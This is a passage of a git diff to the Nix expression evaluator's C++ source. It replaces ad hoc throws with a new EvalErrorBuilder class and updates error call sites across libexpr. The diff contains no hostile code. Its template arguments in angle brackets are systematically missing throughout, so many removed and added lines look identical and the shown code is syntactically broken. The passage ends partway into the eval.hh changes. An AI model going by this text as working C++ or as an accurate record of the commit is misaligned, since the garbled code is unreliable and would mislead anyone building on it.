+ tests/unit/libexpr/error_traces.cc | 20 +- 40 files changed, 653 insertions(+), 545 deletions(-) create mode 100644 src/libexpr/eval-error.cc create mode 100644 src/libexpr/eval-error.hh diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7d8f9819..714d3adb5 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -422,8 +422,6 @@ StringSet NixRepl::completePrefix(const std::string & prefix) // Quietly ignore parse errors. } catch (EvalError & e) { // Quietly ignore evaluation errors. - } catch (UndefinedVarError & e) { - // Quietly ignore undefined variable errors. } catch (BadURL & e) { // Quietly ignore BadURL flake-related errors. } diff --git a/src/libexpr/attr-path.cc b/src/libexpr/attr-path.cc index 7481a2232..d6befd362 100644 --- a/src/libexpr/attr-path.cc +++ b/src/libexpr/attr-path.cc @@ -65,10 +65,10 @@ std::pair findAlongAttrPath(EvalState & state, const std::strin if (!attrIndex) { if (v->type() != nAttrs) - throw TypeError( + state.error( "the expression selected by the selection path '%1%' should be a set but is %2%", attrPath, - showType(*v)); + showType(*v)).debugThrow(); if (attr.empty()) throw Error("empty attribute name in selection path '%1%'", attrPath); @@ -88,10 +88,10 @@ std::pair findAlongAttrPath(EvalState & state, const std::strin else { if (!v->isList()) - throw TypeError( + state.error( "the expression selected by the selection path '%1%' should be a list but is %2%", attrPath, - showType(*v)); + showType(*v)).debugThrow(); if (*attrIndex >= v->listSize()) throw AttrPathNotFound("list index %1% in selection path '%2%' is out of range", *attrIndex, attrPath); diff --git a/src/libexpr/eval-cache.cc b/src/libexpr/eval-cache.cc index 5808d58b6..2fc69e796 100644 --- a/src/libexpr/eval-cache.cc +++ b/src/libexpr/eval-cache.cc @@ -491,7 +491,7 @@ std::shared_ptr AttrCursor::maybeGetAttr(Symbol name, bool forceErro if (forceErrors) debug("reevaluating failed cached attribute '%s'", getAttrPathStr(name)); else - throw CachedEvalError("cached failure of attribute '%s'", getAttrPathStr(name)); + throw CachedEvalError(root->state, "cached failure of attribute '%s'", getAttrPathStr(name)); } else return std::make_shared(root, std::make_pair(shared_from_this(), name), nullptr, std::move(attr)); @@ -500,7 +500,7 @@ std::shared_ptr AttrCursor::maybeGetAttr(Symbol name, bool forceErro // evaluate to see whether 'name' exists } else return nullptr; - //throw TypeError("'%s' is not an attribute set", getAttrPathStr()); + //error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); } } @@ -508,7 +508,7 @@ std::shared_ptr AttrCursor::maybeGetAttr(Symbol name, bool forceErro if (v.type() != nAttrs) return nullptr; - //throw TypeError("'%s' is not an attribute set", getAttrPathStr()); + //error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); auto attr = v.attrs->get(name); @@ -574,14 +574,14 @@ std::string AttrCursor::getString() debug("using cached string attribute '%s'", getAttrPathStr()); return s->first; } else - root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nString && v.type() != nPath) - root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); return v.type() == nString ? v.c_str() : v.path().to_string(); } @@ -616,7 +616,7 @@ string_t AttrCursor::getStringWithContext() return *s; } } else - root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string", getAttrPathStr()).debugThrow(); } } @@ -630,7 +630,7 @@ string_t AttrCursor::getStringWithContext() else if (v.type() == nPath) return {v.path().to_string(), {}}; else - root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow(); } bool AttrCursor::getBool() @@ -643,14 +643,14 @@ bool AttrCursor::getBool() debug("using cached Boolean attribute '%s'", getAttrPathStr()); return *b; } else - root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nBool) - root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not a Boolean", getAttrPathStr()).debugThrow(); return v.boolean; } @@ -665,14 +665,14 @@ NixInt AttrCursor::getInt() debug("using cached integer attribute '%s'", getAttrPathStr()); return i->x; } else - throw TypeError("'%s' is not an integer", getAttrPathStr()); + root->state.error("'%s' is not an integer", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nInt) - throw TypeError("'%s' is not an integer", getAttrPathStr()); + root->state.error("'%s' is not an integer", getAttrPathStr()).debugThrow(); return v.integer; } @@ -687,7 +687,7 @@ std::vector AttrCursor::getListOfStrings() debug("using cached list of strings attribute '%s'", getAttrPathStr()); return *l; } else - throw TypeError("'%s' is not a list of strings", getAttrPathStr()); + root->state.error("'%s' is not a list of strings", getAttrPathStr()).debugThrow(); } } @@ -697,7 +697,7 @@ std::vector AttrCursor::getListOfStrings() root->state.forceValue(v, noPos); if (v.type() != nList) - throw TypeError("'%s' is not a list", getAttrPathStr()); + root->state.error("'%s' is not a list", getAttrPathStr()).debugThrow(); std::vector res; @@ -720,14 +720,14 @@ std::vector AttrCursor::getAttrs() debug("using cached attrset attribute '%s'", getAttrPathStr()); return *attrs; } else - root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); } } auto & v = forceValue(); if (v.type() != nAttrs) - root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); + root->state.error("'%s' is not an attribute set", getAttrPathStr()).debugThrow(); std::vector attrs; for (auto & attr : *getValue().attrs) diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc new file mode 100644 index 000000000..b9411cbf4 --- /dev/null +++ b/src/libexpr/eval-error.cc @@ -0,0 +1,113 @@ +#include "eval-error.hh" +#include "eval.hh" +#include "value.hh" + +namespace nix { + +template +EvalErrorBuilder & EvalErrorBuilder::withExitStatus(unsigned int exitStatus) +{ + error.withExitStatus(exitStatus); + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::atPos(PosIdx pos) +{ + error.err.pos = error.state.positions[pos]; + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::atPos(Value & value, PosIdx fallback) +{ + return atPos(value.determinePos(fallback)); +} + +template +EvalErrorBuilder & EvalErrorBuilder::withTrace(PosIdx pos, const std::string_view text) +{ + error.err.traces.push_front( + Trace{.pos = error.state.positions[pos], .hint = hintfmt(std::string(text)), .frame = false}); + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text) +{ + error.err.traces.push_front( + Trace{.pos = error.state.positions[pos], .hint = hintformat(std::string(text)), .frame = true}); + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::withSuggestions(Suggestions & s) +{ + error.err.suggestions = s; + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::withFrame(const Env & env, const Expr & expr) +{ + // NOTE: This is abusing side-effects. + // TODO: check compatibility with nested debugger calls. + // TODO: What side-effects?? + error.state.debugTraces.push_front(DebugTrace{ + .pos = error.state.positions[expr.getPos()], + .expr = expr, + .env = env, + .hint = hintformat("Fake frame for debugging purposes"), + .isError = true}); + return *this; +} + +template +EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, hintformat hint, bool frame) +{ + error.addTrace(error.state.positions[pos], hint, frame); + return *this; +} + +template +template +EvalErrorBuilder & +EvalErrorBuilder::addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs) +{ + + addTrace(error.state.positions[pos], hintfmt(std::string(formatString), formatArgs...)); + return *this; +} + +template +void EvalErrorBuilder::debugThrow() +{ + if (error.state.debugRepl && !error.state.debugTraces.empty()) { + const DebugTrace & last = error.state.debugTraces.front(); + const Env * env = &last.env; + const Expr * expr = &last.expr; + error.state.runDebugRepl(&error, *env, *expr); + } + + // `EvalState` is the only class that can construct an `EvalErrorBuilder`, + // and it does so in dynamic storage. This is the final method called on + // any such instancve and must delete itself before throwing the underlying + // error. + auto error = std::move(this->error); + delete this; + + throw error; +} + +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; +template class EvalErrorBuilder; + +} diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh new file mode 100644 index 000000000..ee69dce64 --- /dev/null +++ b/src/libexpr/eval-error.hh @@ -0,0 +1,118 @@ +#pragma once + +#include + +#include "error.hh" +#include "pos-idx.hh" + +namespace nix { + +struct Env; +struct Expr; +struct Value; + +class EvalState; +template +class EvalErrorBuilder; + +class EvalError : public Error +{ + template + friend class EvalErrorBuilder; +public: + EvalState & state; + + EvalError(EvalState & state, ErrorInfo && errorInfo) + : Error(errorInfo) + , state(state) + { + } + + template + explicit EvalError(EvalState & state, const std::string & formatString, const Args &... formatArgs) + : Error(formatString, formatArgs...) + , state(state) + { + } +}; + +MakeError(ParseError, Error); +MakeError(AssertionError, EvalError); +MakeError(ThrownError, AssertionError); +MakeError(Abort, EvalError); +MakeError(TypeError, EvalError); +MakeError(UndefinedVarError, EvalError); +MakeError(MissingArgumentError, EvalError); +MakeError(CachedEvalError, EvalError); +MakeError(InfiniteRecursionError, EvalError); + +struct InvalidPathError : public EvalError +{ +public: + Path path; + InvalidPathError(EvalState & state, const Path & path) + : EvalError(state, "path '%s' is not valid", path) + { + } +}; + +template +class EvalErrorBuilder final +{ + friend class EvalState; + + template + explicit EvalErrorBuilder(EvalState & state, const Args &... args) + : error(T(state, args...)) + { + } + +public: + T error; + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withExitStatus(unsigned int exitStatus); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & atPos(PosIdx pos); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & atPos(Value & value, PosIdx fallback = noPos); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withTrace(PosIdx pos, const std::string_view text); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrameTrace(PosIdx pos, const std::string_view text); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withSuggestions(Suggestions & s); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrame(const Env & e, const Expr & ex); + + [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, hintformat hint, bool frame = false); + + template + [[nodiscard, gnu::noinline]] EvalErrorBuilder & + addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs); + + [[gnu::noinline, gnu::noreturn]] void debugThrow(); +}; + +/** + * The size needed to allocate any `EvalErrorBuilder`. + * + * The list of classes here needs to be kept in sync with the list of `template + * class` declarations in `eval-error.cc`. + * + * This is used by `EvalState` to preallocate a buffer of sufficient size for + * any `EvalErrorBuilder` to avoid allocating while evaluating Nix code. + */ +constexpr size_t EVAL_ERROR_BUILDER_SIZE = std::max({ + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), + sizeof(EvalErrorBuilder), +}); + +} diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index 42cb68bbe..03320c7c9 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -3,6 +3,7 @@ #include "print.hh" #include "eval.hh" +#include "eval-error.hh" namespace nix { @@ -115,10 +116,11 @@ inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view e PosIdx pos = getPos(); forceValue(v, pos); if (v.type() != nAttrs) { - error("expected a set but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withTrace(pos, errorCtx).debugThrow(); + error( + "expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).withTrace(pos, errorCtx).debugThrow(); } } @@ -128,10 +130,11 @@ inline void EvalState::forceList(Value & v, const PosIdx pos, std::string_view e { forceValue(v, pos); if (!v.isList()) { - error("expected a list but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withTrace(pos, errorCtx).debugThrow(); + error( + "expected a list but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).withTrace(pos, errorCtx).debugThrow(); } } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..ded4415cc 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -339,46 +339,6 @@ void initGC() gcInitialised = true; } - -ErrorBuilder & ErrorBuilder::atPos(PosIdx pos) -{ - info.errPos = state.positions[pos]; - return *this; -} - -ErrorBuilder & ErrorBuilder::withTrace(PosIdx pos, const std::string_view text) -{ - info.traces.push_front(Trace{ .pos = state.positions[pos], .hint = hintformat(std::string(text)), .frame = false }); - return *this; -} - -ErrorBuilder & ErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text) -{ - info.traces.push_front(Trace{ .pos = state.positions[pos], .hint = hintformat(std::string(text)), .frame = true }); - return *this; -} - -ErrorBuilder & ErrorBuilder::withSuggestions(Suggestions & s) -{ - info.suggestions = s; - return *this; -} - -ErrorBuilder & ErrorBuilder::withFrame(const Env & env, const Expr & expr) -{ - // NOTE: This is abusing side-effects. - // TODO: check compatibility with nested debugger calls. - state.debugTraces.push_front(DebugTrace { - .pos = nullptr, - .expr = expr, - .env = env, - .hint = hintformat("Fake frame for debugging purposes"), - .isError = true - }); - return *this; -} - - EvalState::EvalState( const SearchPath & _searchPath, ref store, @@ -811,7 +771,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & ? std::make_unique( *this, DebugTrace { - .pos = error->info().errPos ? error->info().errPos : positions[expr.getPos()], + .pos = error->info().pos ? error->info().pos : positions[expr.getPos()], .expr = expr, .env = env, .hint = error->info().msg, @@ -930,7 +890,7 @@ inline Value * EvalState::lookupVar(Env * env, const ExprVar & var, bool noEval) return j->value; } if (!fromWith->parentWith) - error("undefined variable '%1%'", symbols[var.name]).atPos(var.pos).withFrame(*env, var).debugThrow(); + error("undefined variable '%1%'", symbols[var.name]).atPos(var.pos).withFrame(*env, var).debugThrow(); for (size_t l = fromWith->prevWith; l; --l, env = env->up) ; fromWith = fromWith->parentWith; } @@ -1136,7 +1096,7 @@ void EvalState::evalFile(const SourcePath & path, Value & v, bool mustBeTrivial) // computation. if (mustBeTrivial && !(dynamic_cast(e))) - error("file '%s' must be an attribute set", path).debugThrow(); + error("file '%s' must be an attribute set", path).debugThrow(); eval(e, v); } catch (Error & e) { addErrorTrace(e, "while evaluating the file '%1%':", resolvedPath.to_string()); @@ -1167,10 +1127,11 @@ inline bool EvalState::evalBool(Env & env, Expr * e, const PosIdx pos, std::stri Value v; e->eval(*this, env, v); if (v.type() != nBool) - error("expected a Boolean but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withFrame(env, *e).debugThrow(); + error( + "expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).withFrame(env, *e).debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -1184,10 +1145,11 @@ inline void EvalState::evalAttrs(Env & env, Expr * e, Value & v, const PosIdx po try { e->eval(*this, env, v); if (v.type() != nAttrs) - error("expected a set but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .withFrame(env, *e).debugThrow(); + error( + "expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).withFrame(env, *e).debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -1296,7 +1258,7 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) auto nameSym = state.symbols.create(nameVal.string_view()); Bindings::iterator j = v.attrs->find(nameSym); if (j != v.attrs->end()) - state.error("dynamic attribute '%1%' already defined at %2%", state.symbols[nameSym], state.positions[j->pos]).atPos(i.pos).withFrame(env, *this).debugThrow(); + state.error("dynamic attribute '%1%' already defined at %2%", state.symbols[nameSym], state.positions[j->pos]).atPos(i.pos).withFrame(env, *this).debugThrow(); i.valueExpr->setName(nameSym); /* Keep sorted order so find can catch duplicates */ @@ -1408,8 +1370,8 @@ void ExprSelect::eval(EvalState & state, Env & env, Value & v) for (auto & attr : *vAttrs->attrs) allAttrNames.insert(state.symbols[attr.name]); auto suggestions = Suggestions::bestMatches(allAttrNames, state.symbols[name]); - state.error("attribute '%1%' missing", state.symbols[name]) - .atPos(pos).withSuggestions(suggestions).withFrame(env, *this).debugThrow(); + state.error("attribute '%1%' missing", state.symbols[name]) + .atPos(pos).withSuggestions(suggestions).withFrame(env, *this).debugThrow(); } } vAttrs = j->value; @@ -1482,7 +1444,7 @@ public: void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & vRes, const PosIdx pos) { if (callDepth > evalSettings.maxCallDepth) - error("stack overflow; max-call-depth exceeded").atPos(pos).template debugThrow(); + error("stack overflow; max-call-depth exceeded").atPos(pos).debugThrow(); CallDepth _level(callDepth); auto trace = evalSettings.traceFunctionCalls @@ -1540,13 +1502,13 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & auto j = args[0]->attrs->get(i.name); if (!j) { if (!i.def) { - error("function '%1%' called without required argument '%2%'", + error("function '%1%' called without required argument '%2%'", (lambda.name ? std::string(symbols[lambda.name]) : "anonymous lambda"), symbols[i.name]) .atPos(lambda.pos) .withTrace(pos, "from call site") .withFrame(*fun.lambda.env, lambda) - .debugThrow(); + .debugThrow(); } env2.values[displ++] = i.def->maybeThunk(*this, env2); } else { @@ -1566,14 +1528,14 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & for (auto & formal : lambda.formals->formals) formalNames.insert(symbols[formal.name]); auto suggestions = Suggestions::bestMatches(formalNames, symbols[i.name]); - error("function '%1%' called with unexpected argument '%2%'", + error("function '%1%' called with unexpected argument '%2%'", (lambda.name ? std::string(symbols[lambda.name]) : "anonymous lambda"), symbols[i.name]) .atPos(lambda.pos) .withTrace(pos, "from call site") .withSuggestions(suggestions) .withFrame(*fun.lambda.env, lambda) - .debugThrow(); + .debugThrow(); } abort(); // can't happen } @@ -1705,11 +1667,12 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & } else - error("attempt to call something which is not a function but %1%: %2%", + error( + "attempt to call something which is not a function but %1%: %2%", showType(vCur), ValuePrinter(*this, vCur, errorPrintOptions)) .atPos(pos) - .debugThrow(); + .debugThrow(); } vRes = vCur; @@ -1779,12 +1742,12 @@ void EvalState::autoCallFunction(Bindings & args, Value & fun, Value & res) if (j != args.end()) { attrs.insert(*j); } else if (!i.def) { - error(R"(cannot evaluate a function that has an argument without a value ('%1%') + error(R"(cannot evaluate a function that has an argument without a value ('%1%') Nix attempted to evaluate a function as a top level expression; in this case it must have its arguments supplied either by default values, or passed explicitly with '--arg' or '--argstr'. See https://nixos.org/manual/nix/stable/language/constructs.html#functions.)", symbols[i.name]) - .atPos(i.pos).withFrame(*fun.lambda.env, *fun.lambda.fun).debugThrow(); + .atPos(i.pos).withFrame(*fun.lambda.env, *fun.lambda.fun).debugThrow(); } } } @@ -1815,7 +1778,7 @@ void ExprAssert::eval(EvalState & state, Env & env, Value & v) if (!state.evalBool(env, cond, pos, "in the condition of the assert statement")) { std::ostringstream out; cond->show(state.symbols, out); - state.error("assertion '%1%' failed", out.str()).atPos(pos).withFrame(env, *this).debugThrow(); + state.error("assertion '%1%' failed", out.str()).atPos(pos).withFrame(env, *this).debugThrow(); } body->eval(state, env, v); } @@ -1993,14 +1956,14 @@ void ExprConcatStrings::eval(EvalState & state, Env & env, Value & v) nf = n; nf += vTmp.fpoint; } else - state.error("cannot add %1% to an integer", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); + state.error("cannot add %1% to an integer", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); } else if (firstType == nFloat) { if (vTmp.type() == nInt) { nf += vTmp.integer; } else if (vTmp.type() == nFloat) { nf += vTmp.fpoint; } else - state.error("cannot add %1% to a float", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); + state.error("cannot add %1% to a float", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); } else { if (s.empty()) s.reserve(es->size()); /* skip canonization of first path, which would only be not @@ -2022,7 +1985,7 @@ void ExprConcatStrings::eval(EvalState & state, Env & env, Value & v) v.mkFloat(nf); else if (firstType == nPath) { if (!context.empty()) - state.error("a string that refers to a store path cannot be appended to a path").atPos(pos).withFrame(env, *this).debugThrow(); + state.error("a string that refers to a store path cannot be appended to a path").atPos(pos).withFrame(env, *this).debugThrow(); v.mkPath(state.rootPath(CanonPath(canonPath(str())))); } else v.mkStringMove(c_str(), context); @@ -2037,8 +2000,9 @@ void ExprPos::eval(EvalState & state, Env & env, Value & v) void ExprBlackHole::eval(EvalState & state, Env & env, Value & v) { - state.error("infinite recursion encountered") - .debugThrow(); + state.error("infinite recursion encountered") + .atPos(v.determinePos(noPos)) + .debugThrow(); } // always force this to be separate, otherwise forceValue may inline it and take @@ -2052,7 +2016,7 @@ void EvalState::tryFixupBlackHolePos(Value & v, PosIdx pos) try { std::rethrow_exception(e); } catch (InfiniteRecursionError & e) { - e.err.errPos = positions[pos]; + e.atPos(positions[pos]); } catch (...) { } } @@ -2100,15 +2064,18 @@ NixInt EvalState::forceInt(Value & v, const PosIdx pos, std::string_view errorCt try { forceValue(v, pos); if (v.type() != nInt) - error("expected an integer but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected an integer but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.integer; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; } + + return v.integer; } @@ -2119,10 +2086,11 @@ NixFloat EvalState::forceFloat(Value & v, const PosIdx pos, std::string_view err if (v.type() == nInt) return v.integer; else if (v.type() != nFloat) - error("expected a float but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected a float but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.fpoint; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2136,15 +2104,18 @@ bool EvalState::forceBool(Value & v, const PosIdx pos, std::string_view errorCtx try { forceValue(v, pos); if (v.type() != nBool) - error("expected a Boolean but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; } + + return v.boolean; } @@ -2159,10 +2130,11 @@ void EvalState::forceFunction(Value & v, const PosIdx pos, std::string_view erro try { forceValue(v, pos); if (v.type() != nFunction && !isFunctor(v)) - error("expected a function but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected a function but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -2175,10 +2147,11 @@ std::string_view EvalState::forceString(Value & v, const PosIdx pos, std::string try { forceValue(v, pos); if (v.type() != nString) - error("expected a string but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected a string but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.string_view(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2207,7 +2180,7 @@ std::string_view EvalState::forceStringNoCtx(Value & v, const PosIdx pos, std::s { auto s = forceString(v, pos, errorCtx); if (v.context()) { - error("the string '%1%' is not allowed to refer to a store path (such as '%2%')", v.string_view(), v.context()[0]).withTrace(pos, errorCtx).debugThrow(); + error("the string '%1%' is not allowed to refer to a store path (such as '%2%')", v.string_view(), v.context()[0]).withTrace(pos, errorCtx).debugThrow(); } return s; } @@ -2272,11 +2245,13 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a string: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) + error( + "cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ) .withTrace(pos, errorCtx) - .debugThrow(); + .debugThrow(); } return coerceToString(pos, *i->value, context, errorCtx, coerceMore, copyToStore, canonicalizePath); @@ -2284,7 +2259,7 @@ BackedStringView EvalState::coerceToString( if (v.type() == nExternal) { try { - return v.external->coerceToString(positions[pos], context, coerceMore, copyToStore); + return v.external->coerceToString(*this, pos, context, coerceMore, copyToStore); } catch (Error & e) { e.addTrace(nullptr, errorCtx); throw; @@ -2320,18 +2295,19 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) + error("cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ) .withTrace(pos, errorCtx) - .debugThrow(); + .debugThrow(); } StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePath & path) { if (nix::isDerivation(path.path.abs())) - error("file names are not allowed to end in '%1%'", drvExtension).debugThrow(); + error("file names are not allowed to end in '%1%'", drvExtension).debugThrow(); auto i = srcToStore.find(path); @@ -2380,7 +2356,7 @@ SourcePath EvalState::coerceToPath(const PosIdx pos, Value & v, NixStringContext relative to the root filesystem. */ auto path = coerceToString(pos, v, context, errorCtx, false, false, true).toOwned(); if (path == "" || path[0] != '/') - error("string '%1%' doesn't represent an absolute path", path).withTrace(pos, errorCtx).debugThrow(); + error("string '%1%' doesn't represent an absolute path", path).withTrace(pos, errorCtx).debugThrow(); return rootPath(CanonPath(path)); } @@ -2390,7 +2366,7 @@ StorePath EvalState::coerceToStorePath(const PosIdx pos, Value & v, NixStringCon auto path = coerceToString(pos, v, context, errorCtx, false, false, true).toOwned(); if (auto storePath = store->maybeParseStorePath(path)) return *storePath; - error("path '%1%' is not in the Nix store", path).withTrace(pos, errorCtx).debugThrow(); + error("path '%1%' is not in the Nix store", path).withTrace(pos, errorCtx).debugThrow(); } @@ -2400,18 +2376,18 @@ std::pair EvalState::coerceToSingleDerivedP auto s = forceString(v, context, pos, errorCtx); auto csize = context.size(); if (csize != 1) - error( + error( "string '%s' has %d entries in its context. It should only have exactly one entry", s, csize) - .withTrace(pos, errorCtx).debugThrow(); + .withTrace(pos, errorCtx).debugThrow(); auto derivedPath = std::visit(overloaded { [&](NixStringContextElem::Opaque && o) -> SingleDerivedPath { return std::move(o); }, [&](NixStringContextElem::DrvDeep &&) -> SingleDerivedPath { - error( + error( "string '%s' has a context which refers to a complete source and binary closure. This is not supported at this time", - s).withTrace(pos, errorCtx).debugThrow(); + s).withTrace(pos, errorCtx).debugThrow(); }, [&](NixStringContextElem::Built && b) -> SingleDerivedPath { return std::move(b); @@ -2434,16 +2410,16 @@ SingleDerivedPath EvalState::coerceToSingleDerivedPath(const PosIdx pos, Value & error message. */ std::visit(overloaded { [&](const SingleDerivedPath::Opaque & o) { - error( + error( "path string '%s' has context with the different path '%s'", s, sExpected) - .withTrace(pos, errorCtx).debugThrow(); + .withTrace(pos, errorCtx).debugThrow(); }, [&](const SingleDerivedPath::Built & b) { - error( + error( "string '%s' has context with the output '%s' from derivation '%s', but the string is not the right placeholder for this derivation output. It should be '%s'", s, b.output, b.drvPath->to_string(*store), sExpected) - .withTrace(pos, errorCtx).debugThrow(); + .withTrace(pos, errorCtx).debugThrow(); } }, derivedPath.raw()); } @@ -2528,7 +2504,7 @@ bool EvalState::eqValues(Value & v1, Value & v2, const PosIdx pos, std::string_v case nThunk: // Must not be left by forceValue default: - error("cannot compare %1% with %2%", showType(v1), showType(v2)).withTrace(pos, errorCtx).debugThrow(); + error("cannot compare %1% with %2%", showType(v1), showType(v2)).withTrace(pos, errorCtx).debugThrow(); } } @@ -2767,13 +2743,12 @@ SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_ if (hasPrefix(path, "nix/")) return {corepkgsFS, CanonPath(path.substr(3))}; - debugThrow(ThrownError({ - .msg = hintfmt(evalSettings.pureEval + error( + evalSettings.pureEval ? "cannot look up '<%s>' in pure evaluation mode (use '--impure' to override)" : "file '%s' was not found in the Nix search path (add it using $NIX_PATH or -I)", - path), - .errPos = positions[pos] - }), 0, 0); + path + ).atPos(pos).debugThrow(); } @@ -2856,11 +2831,11 @@ Expr * EvalState::parse( } -std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const +std::string ExternalValueBase::coerceToString(EvalState & state, const PosIdx & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { - throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), *this) - }); + state.error( + "cannot coerce %1% to a string: %2%", showType(), *this + ).atPos(pos).debugThrow(); } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 2368187b1..afe89cd30 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -2,6 